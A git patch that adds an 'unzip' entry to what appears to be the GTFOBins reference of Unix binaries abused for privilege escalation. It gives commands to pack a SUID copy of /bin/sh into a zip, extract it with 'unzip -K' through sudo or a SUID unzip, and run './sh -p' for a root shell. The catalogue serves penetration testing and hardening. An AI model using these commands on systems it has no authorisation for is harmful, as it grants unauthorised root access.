From 2b769ace783f4ff68a913b26a441c66ff8ba18d6 Mon Sep 17 00:00:00 2001
From: Pablo <72967429+10rdP4@users.noreply.github.com>
Date: Wed, 13 Jul 2022 15:03:27 +0200
Subject: [PATCH] Add unzip

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
---
 _gtfobins/unzip.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 _gtfobins/unzip.md

diff --git a/_gtfobins/unzip.md b/_gtfobins/unzip.md
new file mode 100644
index 0000000..fff72b9
--- /dev/null
+++ b/_gtfobins/unzip.md
@@ -0,0 +1,21 @@
+---
+description: |
+  Certain `unzip` versions allows to preserve the SUID bit. Prepare an archive beforehand with the following commands as root:
+
+  ```
+  cp /bin/sh .
+  chmod +s sh
+  zip shell.zip sh
+  ```
+
+  Extract it on the target, then run the SUID shell as usual (omitting the `-p` where appropriate).
+functions:
+  sudo:
+    - code: |
+        sudo unzip -K shell.zip
+        ./sh -p
+  suid:
+    - code: |
+        ./unzip -K shell.zip
+        ./sh -p
+---